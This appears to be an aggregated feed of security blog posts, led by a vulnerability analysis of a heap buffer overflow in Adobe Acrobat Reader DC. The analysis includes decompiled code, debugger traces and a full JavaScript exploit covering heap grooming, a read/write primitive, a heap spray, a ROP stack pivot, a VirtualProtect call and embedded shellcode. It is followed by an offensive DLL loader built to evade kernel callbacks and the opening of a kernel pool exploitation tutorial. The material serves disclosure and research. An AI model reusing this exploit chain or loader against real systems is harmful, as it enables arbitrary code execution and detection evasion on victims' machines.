Acrobat Reader has a built-in JavaScript engine based on Mozilla’s SpiderMonkey. Embedded JavaScript code in PDF files is processed and executed by the EScript.api module in Adobe Reader.

Internet access related operations are handled by the IA32.api module. The vulnerability occurs within this module when a URL is built by concatenating the PDF document’s base URL and a relative URL. This relative URL is specified as a parameter in a call to JavaScript functions that trigger any kind of Internet access such as this.submitForm and app.launchURL. In particular, the vulnerability occurs when the encoding of both strings differ.

The concatenation of both strings is done by allocating enough memory to fit the final string. The computation of the length of both strings is correctly done taking into account whether they are ANSI or Unicode. However, when the concatenation occurs only the base URL encoding is checked and the relative URL is considered to have the same encoding as the base URL. When the relative URL is ANSI encoded, the code that copies bytes from the relative URL string buffer into the allocated buffer copies it two bytes at a time instead of just one byte at a time. This leads to reading a number of bytes equal to the length of the relative URL from outside the source buffer and copying it beyond the bounds of the destination buffer by the same length, resulting in both an out-of-bounds read and an out-of-bounds write vulnerability.

Code Analysis

The following code blocks show the affected parts of methods relevant to this vulnerability. Code snippets are demarcated by reference marks denoted by [N]. Lines not relevant to this vulnerability are replaced by a [Truncated] marker.

All code listings show decompiled C code; source code is not available in the affected product. Structure definitions are obtained by reverse engineering and may not accurately reflect structures defined in the source code.

The following function is called when a relative URL needs to be concatenated to a base URL. Aside from the concatenation it also checks that both URLs are valid.

__int16 __cdecl sub_25817D70(wchar_t *Source, CHAR *lpString, char *String, _DWORD *a4, int *a5)
{
  __int16 v5; // di
  CHAR v6; // cl
  CHAR *v7; // ecx
  CHAR v8; // al
  CHAR v9; // dl
  CHAR *v10; // eax
  bool v11; // zf
  CHAR *v12; // eax

[Truncated]

  int iMaxLength; // [esp+D4h] [ebp-14h]
  LPCSTR v65; // [esp+D8h] [ebp-10h]
  int v66; // [esp+DCh] [ebp-Ch] BYREF
  LPCSTR v67; // [esp+E0h] [ebp-8h]
  wchar_t *v68; // [esp+E4h] [ebp-4h]

  v68 = 0;
  v65 = 0;
  v67 = 0;
  v38 = 0;
  v51 = 0;
  v63 = 0;
  v5 = 1;
  if ( !a5 )
    return 0;
  *a5 = 0;
  if ( lpString )
  {
    if ( *lpString )
    {
      v6 = lpString[1];
      if ( v6 )
      {

[1]

        if ( *lpString == (CHAR)0xFE && v6 == (CHAR)0xFF )
        {
          v7 = lpString;
          while ( 1 )
          {
            v8 = *v7;
            v9 = v7[1];
            v7 += 2;
            if ( !v8 )
              break;
            if ( !v9 || !v7 )
              goto LABEL_14;
          }
          if ( !v9 )
            goto LABEL_15;

[2]

LABEL_14:
          *a5 = -2;
          return 0;
        }
      }
    }
  }
LABEL_15:
  if ( !Source || !lpString || !String || !a4 )
  {
    *a5 = -2;
    goto LABEL_79;
  }

[3]

  iMaxLength = sub_25802A44((LPCSTR)Source) + 1;
  v10 = (CHAR *)sub_25802CD5(1, iMaxLength);
  v65 = v10;
  if ( !v10 )
  {
    *a5 = -7;
    return 0;
  }

[4]

  sub_25802D98((wchar_t *)v10, Source, iMaxLength);
  if ( *lpString != (CHAR)0xFE || (v11 = lpString[1] == -1, v67 = (LPCSTR)2, !v11) )
    v67 = (LPCSTR)1;

[5]

  v66 = (int)&v67[sub_25802A44(lpString)];
  v12 = (CHAR *)sub_25802CD5(1, v66);
  v67 = v12;
  if ( !v12 )
  {
    *a5 = -7;
LABEL_79:
    v5 = 0;
    goto LABEL_80;
  }

[6]

  sub_25802D98((wchar_t *)v12, (wchar_t *)lpString, v66);
  if ( !(unsigned __int16)sub_258033CD(v65, iMaxLength, a5) || !(unsigned __int16)sub_258033CD(v67, v66, a5) )
    goto LABEL_79;

[7]

  v13 = sub_25802400(v65, v31);
  if ( v13 || (v13 = sub_25802400(v67, v39)) != 0 )
  {
    *a5 = v13;
    goto LABEL_79;
  }

[Truncated]

[8]

  v23 = (wchar_t *)sub_25802CD5(1, v47 + 1 + v35);
  v68 = v23;
  if ( v23 )
  {
    if ( v35 )
    {

[9]

      sub_25802D98(v23, v36, v35 + 1);
      if ( *((_BYTE *)v23 + v35 - 1) != 47 )
      {
        v25 = sub_25818CE4(v24, (char *)v23, 47);
        if ( v25 )
          *(_BYTE *)(v25 + 1) = 0;
        else
          *(_BYTE *)v23 = 0;
      }
    }
    if ( v47 )
    {

[10]

      v26 = sub_25802A44((LPCSTR)v23);
      sub_25818BE0((char *)v23, v48, v47 + 1 + v26);
    }
    sub_25802E0C(v23, 0);
    v60 = sub_25802A44((LPCSTR)v23);
    v61 = v23;
    goto LABEL_69;
  }
  v5 = 0;
  *a4 = v47 + v35 + 1;
  *a5 = -3;
LABEL_81:
  if ( v65 )
    (*(void (__cdecl **)(LPCSTR))(dword_25824088 + 12))(v65);
  if ( v67 )
    (*(void (__cdecl **)(LPCSTR))(dword_25824088 + 12))(v67);
  if ( v23 )
    (*(void (__cdecl **)(wchar_t *))(dword_25824088 + 12))(v23);
  return v5;
}

The function listed above receives as parameters a string corresponding to a base URL and a string corresponding to a relative URL, as well as two pointers used to return data to the caller. The two string parameters are shown in the following debugger output.

IA32!PlugInMain+0x168b0:
605a7d70 55              push    ebp
0:000> dd poi(esp+4) L84
099a35f0  0068fffe 00740074 00730070 002f003a
099a3600  0067002f 006f006f 006c0067 002e0065
099a3610  006f0063 002f006d 41414141 41414141
099a3620  41414141 41414141 41414141 41414141
099a3630  41414141 41414141 41414141 41414141

[Truncated]

099a37c0  41414141 41414141 41414141 41414141
099a37d0  41414141 41414141 41414141 41414141
099a37e0  41414141 41414141 41414141 2f2f3a41
099a37f0  00000000 00680074 00730069 006f002e
0:000> du poi(esp+4)
099a35f0  ".https://google.com/䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁"
099a3630  "䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁"
099a3670  "䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁"
099a36b0  "䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁"
099a36f0  "䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁"
099a3730  "䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁"
099a3770  "䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁"
099a37b0  "䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁㩁."
099a37f0  ""
0:000> dd poi(esp+8)
0b2d30b0  61616262 61616161 61616161 61616161
0b2d30c0  61616161 61616161 61616161 61616161
0b2d30d0  61616161 61616161 61616161 61616161
0b2d30e0  61616161 61616161 61616161 61616161

[Truncated]

0b2d5480  61616161 61616161 61616161 61616161
0b2d5490  61616161 61616161 61616161 61616161
0b2d54a0  61616161 61616161 61616161 00616161
0b2d54b0  4d21fcdc 80000900 41409090 ffff4041
0:000> da poi(esp+8)
0b2d30b0  "bbaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
0b2d30d0  "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
0b2d30f0  "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
0b2d3110  "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"

[Truncated]

0b2d5430  "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
0b2d5450  "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
0b2d5470  "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
0b2d5490  "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"

The debugger output shown above corresponds to an execution of the exploit. It shows the contents of the first and second parameters (esp+4 and esp+8) of the function sub_25817D70. The first parameter contains a Unicode-encoded base URL https://google.com/ (notice the 0xfeff bytes at the start of the string), while the second parameter contains an ASCII string corresponding to the relative URL. Both contain a number of repeated bytes that serve as padding to control the allocation size needed to hold them, which is useful for exploitation.

At [1] a check is made to ascertain whether the second parameter is a valid Unicode string. If an anomaly is found, the function returns at [2]. The function sub_25802A44 at [3] computes the length of the string provided as a parameter, regardless of its encoding. The function sub_25802CD5 is an implementation of calloc, which allocates an array with the number of elements provided as the first parameter, each of the size specified as the second parameter. The function sub_25802D98 at [4] copies a number of bytes of the string specified in the second parameter to the buffer pointed to by the first parameter. Its third parameter specifies the number of bytes to be copied. Therefore, at [3] and [4] the length of the base URL is computed, a new allocation of that size plus one is performed, and the base URL string is copied into the new allocation. In an analogous manner, the same operations are performed on the relative URL at [5] and [6].

The function sub_25802400, called at [7], receives a URL or a part of it and performs some validation and processing. This function is called on both base and relative URLs.

At [8] an allocation of the size required to host the concatenation of the relative URL and the base URL is performed. The lengths provided are calculated in the function called at [7]. For the sake of simplicity it is illustrated with an example: the following debugger output shows the value of the parameters to sub_25802CD5 that correspond to the number of elements to be allocated, and the size of each element. In this case the size is the addition of the length of the base and relative URLs.

eax=00002600 ebx=00000000 ecx=00002400 edx=00000000 esi=010fd228 edi=00000001
eip=61912cd5 esp=010fd0e4 ebp=010fd1dc iopl=0         nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000206
IA32!PlugInMain+0x1815:
61912cd5 55              push    ebp
0:000> dd esp+4 L1
010fd0e8  00000001
0:000> dd esp+8 L1
010fd0ec  00002600

Continuing with the function previously listed, at [9] the base URL is copied into the memory allocated to host the concatenation and at [10] its length is calculated and provided as a parameter to the call to sub_25818BE0. This function implements string concatenation for both Unicode and ANSI strings. The call to this function at [10] provides the base URL as the first parameter, the relative URL as the second parameter and the expected full size of the concatenation as the third. This function is listed below.

int __cdecl sub_25818BE0(char *Destination, char *Source, int a3)
{
  int result; // eax
  int pExceptionObject; // [esp+10h] [ebp-4h] BYREF

  if ( !Destination || !Source || !a3 )
  {
    (*(void (__thiscall **)(_DWORD, int))(dword_258240AC + 4))(*(_DWORD *)(dword_258240AC + 4), 1073741827);
    pExceptionObject = 0;
    CxxThrowException(&pExceptionObject, (_ThrowInfo *)&_TI1H);
  }

[11]

  pExceptionObject = sub_25802A44(Destination);
  if ( pExceptionObject + sub_25802A44(Source) <= (unsigned int)(a3 - 1) )
  {

[12]

    sub_2581894C(Destination, Source);
    result = 1;
  }
  else
  {

[13]

    strncat(Destination, Source, a3 - pExceptionObject - 1);
    result = 0;
    Destination[a3 - 1] = 0;
  }
  return result;
}

In the above listing, at [11] the length of the destination string is calculated. The code then checks whether the length of the destination string plus the length of the source string is less than or equal to the desired concatenation length minus one. If the check passes, the function sub_2581894C is called at [12]. Otherwise, the strncat function at [13] is called.

The function sub_2581894C called at [12] implements the actual string concatenation that works for both Unicode and ANSI strings.

LPSTR __cdecl sub_2581894C(LPSTR lpString1, LPCSTR lpString2)
{
  int v3; // eax
  LPCSTR v4; // edx
  CHAR *v5; // ecx
  CHAR v6; // al
  CHAR v7; // bl
  int pExceptionObject; // [esp+10h] [ebp-4h] BYREF

  if ( !lpString1 || !lpString2 )
  {
    (*(void (__thiscall **)(_DWORD, int))(dword_258240AC + 4))(*(_DWORD *)(dword_258240AC + 4), 1073741827);
    pExceptionObject = 0;
    CxxThrowException(&pExceptionObject, (_ThrowInfo *)&_TI1H);
  }

[14]

  if ( *lpString1 == (CHAR)0xFE && lpString1[1] == (CHAR)0xFF )
  {

[15]

    v3 = sub_25802A44(lpString1);
    v4 = lpString2 + 2;
    v5 = &lpString1[v3];
    do
    {
      do
      {
        v6 = *v4;
        v4 += 2;
        *v5 = v6;
        v5 += 2;
        v7 = *(v4 - 1);
        *(v5 - 1) = v7;
      }
      while ( v6 );
    }
    while ( v7 );
  }
  else
  {

[16]

    lstrcatA(lpString1, lpString2);
  }
  return lpString1;
}

In the function listed above, at [14] the first parameter (the destination) is checked for the Unicode BOM marker 0xFEFF. If the destination string is Unicode the code proceeds to [15]. There, the source string is appended at the end of the destination string two bytes at a time. If the destination string is ANSI, then the known lstrcatA function is called.

It becomes clear that in the event that the destination string is Unicode and the source string is ANSI, for each character of the ANSI string two bytes are actually copied. This causes an out-of-bounds read of the size of the ANSI string that becomes a heap buffer overflow of the same size once the bytes are copied.

Exploitation

We’ll now walk through how this vulnerability can be exploited to achieve arbitrary code execution. 

Adobe Acrobat Reader DC version 2020.013.20074 running on Windows 10 x64 was used to develop the exploit. Note that Adobe Acrobat Reader DC is a 32-bit application. A successful exploit strategy needs to bypass the following security mitigations on the target:

  • Address Space Layout Randomization (ASLR)
  • Data Execution Prevention (DEP)
  • Control Flow Guard (CFG)
  • Sandbox Bypass

The exploit does not bypass the following protection mechanisms:

  • Adobe Sandbox protection: Sandbox protection must be disabled in Adobe Reader for this exploit to work. This may be done from Adobe Reader user interface by unchecking the Enable Protected Mode at Startup option found in Preferences -> Security (Enhanced)
  • Control Flow Guard (CFG): CFG must be disabled in the Windows machine for this exploit to work. This may be done from the Exploit Protection settings of Windows 10, setting the Control Flow Guard (CFG) option to Off by default.

In order to exploit this vulnerability bypassing ASLR and DEP, the following strategy is adopted:

  1. Prepare the heap layout to allow controlling the memory areas adjacent to the allocations made for the base URL and the relative URL. This involves performing enough allocations to activate the Low Fragmentation Heap bucket for the two sizes, and enough allocations to entirely fit a UserBlock. The allocations with the same size as the base URL allocation must contain an ArrayBuffer object, while the allocations with the same size as the relative URL must have the data required to overwrite the byteLength field of one of those ArrayBuffer objects with the value 0xffff.
  2. Poke some holes on the UserBlock by nullifying the reference to some of the recently allocated memory chunks.
  3. Trigger the garbage collector to free the memory chunks referenced by the nullified objects. This provides room for the base URL and relative URL allocations.
  4. Trigger the heap buffer overflow vulnerability, so the data in the memory chunk adjacent to the relative URL will be copied to the memory chunk adjacent to the base URL.
  5. If everything worked, step 4 should have overwritten the byteLength of one of the controlled ArrayBuffer objects. When a DataView object is created on the corrupted ArrayBuffer it is possible to read and write memory beyond the underlying allocation. This provides a precise way of overwriting the byteLength of the next ArrayBuffer with the value 0xffffffff. Creating a DataView object on this last ArrayBuffer allows reading and writing memory arbitrarily, but relative to where the ArrayBuffer is.
  6. Using the R/W primitive built, walk the NT Heap structure to identify the BusyBitmap.Buffer pointer. This allows knowing the absolute address of the corrupted ArrayBuffer and build an arbitrary read and write primitive that allows reading from and writing to absolute addresses.
  7. To bypass DEP it is required to pivot the stack to a controlled memory area. This is done by using a ROP gadget that writes a fixed value to the ESP register.
  8. Spray the heap with ArrayBuffer objects with the correct size so they are adjacent to each other. This should place a controlled allocation at the address pointed by the stack-pivoting ROP gadget.
  9. Use the arbitrary read and write to write shellcode in a controlled memory area, and to write the ROP chain to execute VirtualProtect to enable execution permissions on the memory area where the shellcode was written.
  10. Overwrite a function pointer of the DataView object used in the read and write primitive and trigger its call to hijack the execution flow.

The following sub-sections break down the exploit code with explanations for better understanding.

Preparing the Heap Layout

The size of the strings involved in this vulnerability can be controlled. This is convenient since it allows selecting the right size for each of them so they are handled by the Low Fragmentation Heap. The inner workings of the Low Fragmentation Heap (LFH) can be leveraged to increase the determinism of the memory layout required to exploit this vulnerability. Selecting a size that is not used in the program allows full control to activate the LFH bucket corresponding to it, and perform the exact number of allocations required to fit one UserBlock.

The memory chunks within a UserBlock are returned to the user randomly when an allocation is performed. The ideal layout required to exploit this vulnerability is having free chunks adjacent to controlled chunks, so when the strings required to trigger the vulnerability are allocated they fall in one of those free chunks.

In order to set up such a layout, 0xd+0x11 ArrayBuffers of size 0x2608-0x10-0x8 are allocated. The first 0x11 allocations are used to enable the LFH bucket, and the next 0xd allocations are used to fill a UserBlock (note that the number of chunks in the first UserBlock for that bucket size is not always 0xd, so this technique is not 100% effective). The ArrayBuffer size is selected so the underlying allocation is of size 0x2608 (including the chunk metadata), which corresponds to an LFH bucket not used by the application.

Then, the same procedure is done but allocating strings whose underlying allocation size is 0x2408, instead of allocating ArrayBuffers. The number of allocations to fit a UserBlock for this size can be 0xe.

The strings should contain the bytes required to overwrite the byteLength property of the ArrayBuffer that is corrupted once the vulnerability is triggered. The value that will overwrite the byteLength property is 0xffff. This does not allow leveraging the ArrayBuffer to read and write to the whole range of memory addresses in the process. Also, it is not possible to directly overwrite the byteLength with the value 0xffffffff since it would require overwriting the pointer of its DataView object with a non-zero value, which would corrupt it and break its functionality. Instead, writing only 0xffff allows avoiding overwriting the DataView object pointer, keeping its functionality intact since the leftmost two null bytes would be considered the Unicode string terminator during the concatenation operation.

function massageHeap() {

[1]

    var arrayBuffers = new Array(0xd+0x11);
    for (var i = 0; i < arrayBuffers.length; i++) {
        arrayBuffers[i] = new ArrayBuffer(0x2608-0x10-0x8);
        var dv = new DataView(arrayBuffers[i]);
    }

[2]

    var holeDistance = (arrayBuffers.length-0x11) / 2 - 1;
    for (var i = 0x11; i <= arrayBuffers.length; i += holeDistance) {
        arrayBuffers[i] = null;
    }


[3]

    var strings = new Array(0xe+0x11);
    var str = unescape('%u9090%u4140%u4041%uFFFF%u0000') + unescape('%0000%u0000') + unescape('%u9090%u9090').repeat(0x2408);
    for (var i = 0; i < strings.length; i++) {
        strings[i] = str.substring(0, (0x2408-0x8)/2 - 2).toUpperCase();
    }


[4]

    var holeDistance = (strings.length-0x11) / 2 - 1;
    for (var i = 0x11; i <= strings.length; i += holeDistance) {
        strings[i] = null;
    }

    return arrayBuffers;
}

In the listing above, the ArrayBuffer allocations are created in [1]. Then in [2] two pointers to the created allocations are nullified in order to attempt to create free chunks surrounded by controlled chunks.

At [3] and [4] the same steps are done with the allocated strings.

Triggering the Vulnerability

Triggering the vulnerability is as easy as calling the app.launchURL JavaScript function. Internally, the relative URL provided as a parameter is concatenated to the base URL defined in the PDF document catalog, thus executing the vulnerable function explained in the Code Analysis section of this document.

function triggerHeapOverflow() {
    try {
        app.launchURL('bb' + 'a'.repeat(0x2608 - 2 - 0x200 - 1 -0x8));
    } catch(err) {}
}

The size of the allocation holding the relative URL string must be the same as the one used when preparing the heap layout so it occupies one of the freed spots, and ideally having a controlled allocation adjacent to it.

Obtaining an Arbitrary Read / Write Primitive

When the proper heap layout is successfully achieved and the vulnerability has been triggered, an ArrayBuffer byteLength property would be corrupted with the value 0xffff. This allows writing past the boundaries of the underlying memory allocation and overwriting the byteLength property of the next ArrayBuffer. Finally, creating a DataView object on this last corrupted buffer allows to read and write to the whole memory address range of the process in a relative manner.

In order to be able to read from and write to absolute addresses the memory address of the corrupted ArrayBuffer must be obtained. One way of doing it is to leverage the NT Heap metadata structures to leak a pointer to the same structure. It is relevant that the chunk header contains the chunk number and that all the chunks in a UserBlock are consecutive and adjacent. In addition, the size of the chunks are known, so it is possible to compute the distance from the origin of the relative read and write primitive to the pointer to leak. In an analogous manner, since the distance is known, once the pointer is leaked the distance can be subtracted from it to obtain the address of the origin of the read and write primitive.

The following function implements the process described in this subsection.

function getArbitraryRW(arrayBuffers) {

[1]

    for (var i = 0; i < arrayBuffers.length; i++) {
        if (arrayBuffers[i] != null && arrayBuffers[i].byteLength == 0xffff) {
            var dv = new DataView(arrayBuffers[i]);
            dv.setUint32(0x25f0+0xc, 0xffffffff, true);
        }
    }

[2]

    for (var i = 0; i < arrayBuffers.length; i++) {
        if (arrayBuffers[i] != null && arrayBuffers[i].byteLength == -1) {
            var rw = new DataView(arrayBuffers[i]);
            corruptedBuffer = arrayBuffers[i];
        }
    }

[3]

    if (rw) {
        var chunkNumber = rw.getUint8(0xffffffff+0x1-0x13, true);
        var chunkSize = 0x25f0+0x10+8;

        var distanceToBitmapBuffer = (chunkSize * chunkNumber) + 0x18 + 8;
        var bitmapBufferPtr = rw.getUint32(0xffffffff+0x1-distanceToBitmapBuffer, true);

        startAddr = bitmapBufferPtr + distanceToBitmapBuffer-4;
        return rw;
    }
    return rw;
}

The function above at [1] tries to locate the initial corrupted ArrayBuffer and leverages it to corrupt the adjacent ArrayBuffer. At [2] it tries to locate the recently corrupted ArrayBuffer and build the relative arbitrary read and write primitive by creating a DataView object on it. Finally, at [3] the aforementioned method of obtaining the absolute address of the origin of the relative read and write primitive is implemented.

Once the origin address of the read and write primitive is known it is possible to use the following helper functions to read and write to any address of the process that has mapped memory.

function readUint32(dataView, absoluteAddress) {
    var addrOffset = absoluteAddress - startAddr;
    if (addrOffset < 0) {
        addrOffset = addrOffset + 0xffffffff + 1;
    }
    return dataView.getUint32(addrOffset, true);
}

function writeUint32(dataView, absoluteAddress, data) {
    var addrOffset = absoluteAddress - startAddr;
    if (addrOffset < 0) {
        addrOffset = addrOffset + 0xffffffff + 1;
    }
    dataView.setUint32(addrOffset, data, true);
}

Spraying ArrayBuffer Objects

The heap spray technique performs a large number of controlled allocations with the intention of having adjacent regions of controllable memory. The key to obtaining adjacent memory regions is to make the allocations of a specific size.

In JavaScript, a convenient way of making allocations in the heap whose content is completely controlled is by using ArrayBuffer objects. The memory allocated with these objects can be read from and written to with the use of DataView objects.

In order to get the heap allocation of the right size the metadata of ArrayBuffer objects and heap chunks have to be taken into consideration. The internal representation of ArrayBuffer objects tells that the size of the metadata is 0x10 bytes. The size of the metadata of a busy heap chunk is 8 bytes.

Since the objective is to have adjacent memory regions filled with controlled data, the allocations performed must have the exact same size as the heap segment size, which is 0x10000 bytes. Therefore, the ArrayBuffer objects created during the heap spray must be of 0xffe8 bytes.

function sprayHeap() {
    var heapSegmentSize = 0x10000;

[1]

    heapSpray = new Array(0x8000);
    for (var i = 0; i < 0x8000; i++) {
        heapSpray[i] = new ArrayBuffer(heapSegmentSize-0x10-0x8);
        var tmpDv = new DataView(heapSpray[i]);
        tmpDv.setUint32(0, 0xdeadbabe, true);
    }
}

The exploit function listed above performs the ArrayBuffer spray. The total size of the spray defined in [1] was determined by setting a number high enough so an ArrayBuffer would be allocated at the selected predictable address defined by the stack pivot ROP gadget used.

The purpose of these allocations is to have a controllable memory region at the address where the stack is relocated after the stack pivot executes. This area can be used to prepare the call to VirtualProtect that enables execution permissions on the memory page where the shellcode is written.

Hijacking the Execution Flow and Executing Arbitrary Code

With the ability to arbitrarily read and write memory, the next steps are preparing the shellcode, writing it, and executing it. The security mitigations present in the application determine the strategy and techniques required. ASLR and DEP force using Return Oriented Programming (ROP) combined with leaked pointers to the relevant modules.

Taking this into account, the strategy can be the following:

  1. Obtain pointers to the relevant modules to calculate their base addresses.
  2. Pivot the stack to a memory region under our control where the addresses of the ROP gadgets can be written.
  3. Write the shellcode.
  4. Call VirtualProtect to change the shellcode memory region permissions to allow execution.
  5. Overwrite a function pointer that can be called later from JavaScript.

The following functions are used in the implementation of the mentioned strategy.

[1]

function getAddressLeaks(rw) {
    var dataViewObjPtr = rw.getUint32(0xffffffff+0x1-0x8, true);

    var escriptAddrDelta = 0x275518;
    var escriptAddr = readUint32(rw, dataViewObjPtr+0xc) - escriptAddrDelta;

    var kernel32BaseDelta = 0x273eb8;
    var kernel32Addr = readUint32(rw, escriptAddr + kernel32BaseDelta);

    return [escriptAddr, kernel32Addr];
}
 
[2]

function prepareNewStack(kernel32Addr) {

    var virtualProtectStubDelta = 0x20420;
    writeUint32(rw, newStackAddr, kernel32Addr + virtualProtectStubDelta);

    var shellcode = [0x0082e8fc, 0x89600000, 0x64c031e5, 0x8b30508b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0x3cacff31,
        0x2c027c61, 0x0dcfc120, 0xf2e2c701, 0x528b5752, 0x3c4a8b10, 0x78114c8b, 0xd10148e3, 0x20598b51,
        0x498bd301, 0x493ae318, 0x018b348b, 0xacff31d6, 0x010dcfc1, 0x75e038c7, 0xf87d03f6, 0x75247d3b,
        0x588b58e4, 0x66d30124, 0x8b4b0c8b, 0xd3011c58, 0x018b048b, 0x244489d0, 0x615b5b24, 0xff515a59,
        0x5a5f5fe0, 0x8deb128b, 0x8d016a5d, 0x0000b285, 0x31685000, 0xff876f8b, 0xb5f0bbd5, 0xa66856a2,
        0xff9dbd95, 0x7c063cd5, 0xe0fb800a, 0x47bb0575, 0x6a6f7213, 0xd5ff5300, 0x636c6163, 0x6578652e,
        0x00000000]


[3]

    var shellcode_size = shellcode.length * 4;
    writeUint32(rw, newStackAddr + 4 , startAddr);
    writeUint32(rw, newStackAddr + 8, startAddr);
    writeUint32(rw, newStackAddr + 0xc, shellcode_size);
    writeUint32(rw, newStackAddr + 0x10, 0x40);
    writeUint32(rw, newStackAddr + 0x14, startAddr + shellcode_size);

[4]

    for (var i = 0; i < shellcode.length; i++) {
        writeUint32(rw, startAddr+i*4, shellcode[i]);
    }

}

function hijackEIP(rw, escriptAddr) {
    var dataViewObjPtr = rw.getUint32(0xffffffff+0x1-0x8, true);

    var dvShape = readUint32(rw, dataViewObjPtr);
    var dvShapeBase = readUint32(rw, dvShape);
    var dvShapeBaseClasp = readUint32(rw, dvShapeBase);

    var stackPivotGadgetAddr = 0x2de29 + escriptAddr;

    writeUint32(rw, dvShapeBaseClasp+0x10, stackPivotGadgetAddr);

    var foo = rw.execFlowHijack;
}

In the code listing above, the function at [1] obtains the base addresses of the EScript.api and kernel32.dll modules, which are the ones required to exploit the vulnerability with the current strategy. The function at [2] is used to prepare the contents of the relocated stack, so that once the stack pivot is executed everything is ready. In particular, at [3] the address to the shellcode and the parameters to VirtualProtect are written. The address to the shellcode corresponds to the return address that the ret instruction of the VirtualProtect will restore, redirecting this way the execution flow to the shellcode. The shellcode is written at [4].

Finally, in hijackEIP the getProperty function pointer of a DataView object under our control is overwritten with the address of the ROP gadget used to pivot the stack, and a property of the object is accessed, which triggers the execution of getProperty.

The stack pivot gadget used is from the EScript.api module, and is listed below:

0x2382de29: mov esp, 0x5d0013c2; ret;

When the instructions listed above are executed, the stack will be relocated to 0x5d0013c2 where the previously prepared allocation would be.

Conclusion

We hope you enjoyed reading this analysis of a heap buffer-overflow and learned something new. If you’re hungry for more, go and checkout our other blog posts!

The post Analysis of a Heap Buffer-Overflow Vulnerability in Adobe Acrobat Reader DC appeared first on Exodus Intelligence.

☑ ★ ✇ KitPloit - PenTest & Hacking Tools

DarkLoadLibrary - LoadLibrary For Offensive Operations

By: Zion3R


LoadLibrary for offensive operations.


How does it work?

https://www.mdsec.co.uk/2021/06/bypassing-image-load-kernel-callbacks/


Usage
DARKMODULE DarkModule = DarkLoadLibrary(
    LOAD_LOCAL_FILE,  // control flags
    L"TestDLL.dll",   // local dll path, if loading from disk
    NULL,             // DLL buffer to load from, if loading from memory
    0,                // dll size, if loading from memory
    NULL              // dll name, if loaded from memory
);

Control Flags:
  • LOAD_LOCAL_FILE - Load a DLL from the file system.
  • LOAD_MEMORY - Load a DLL from a buffer.
  • NO_LINK - Don't link this module to the PEB, just execute it.

DLL Path:

This can be any path that CreateFileW will open.


DLL Buffer:

This argument is only needed when LOAD_MEMORY is set. In that case this argument should be the buffer containing the DLL.


DLL Size:

This argument is only needed when LOAD_MEMORY is set. In that case this argument should be the size of the buffer containing the DLL.


DLL Name:

This argument is only needed when LOAD_MEMORY is set. In that case this argument should be the name under which the DLL will be registered in the PEB.
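To illustrate the LOAD_MEMORY path, a hypothetical call based purely on the parameter descriptions above might look like this (pDllBuffer and dwDllSize are placeholder names for a DLL image already read into memory):

DARKMODULE DarkModule = DarkLoadLibrary(
    LOAD_MEMORY,      // control flags
    NULL,             // no on-disk path when loading from memory
    pDllBuffer,       // buffer containing the DLL
    dwDllSize,        // size of that buffer
    L"TestDLL.dll"    // name the module should appear under in the PEB
);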


Considerations

The Windows loader is very complex and can handle all the edge cases and intricacies of loading DLLs. There are going to be edge cases which I have not had the time to discover, reverse engineer, and implement, so there are going to be DLLs that this loader simply will not work with.

That being said, I plan on making this loader as complete as possible, so please open issues for DLLs that are not correctly loaded.



☑ ★ ✇ Connor McGarr

Exploit Development: Swimming In The (Kernel) Pool - Leveraging Pool Vulnerabilities From Low-Integrity Exploits, Part 1

By: Connor McGarr

Introduction

I am writing this blog as I am finishing up an amazing training from HackSys Team. This training finally demystified the pool on Windows for me - something that I have always shied away from. During the training I picked up a lot of pointers (pun fully intended) on everything from an introduction to the kernel low fragmentation heap (kLFH) to pool grooming. As I use blogging as a mechanism not only to share what I know, but to reinforce concepts by writing about them, I wanted to leverage the win10-klfh branch of the HackSys Extreme Vulnerable Driver (HEVD) to chain together two vulnerabilities in the driver from a low-integrity process - an out-of-bounds read and a pool overflow - to achieve an arbitrary read/write primitive. This blog, part 1 of this series, will outline the out-of-bounds read and kASLR bypass from low integrity.

Low integrity processes and AppContainer protected processes, such as a browser sandbox, prevent Windows API calls such as EnumDeviceDrivers and NtQuerySystemInformation, which are commonly leveraged to retrieve the base address of ntoskrnl.exe and/or other drivers for kernel exploitation. This stipulation requires a generic kASLR bypass, as was common in the RS2 build of Windows via GDI objects, or some type of vulnerability. With generic kASLR bypasses now being very scarce and few and far between, information leaks, such as an out-of-bounds read, are the de-facto standard for bypassing kASLR from something like a browser sandbox.

This blog will touch on the basic internals of the pool on Windows, which are already documented much better than any attempt I could make, the implications of the kLFH from an exploit development perspective, and leveraging out-of-bounds read vulnerabilities.

Windows Pool Internals - tl;dr Version

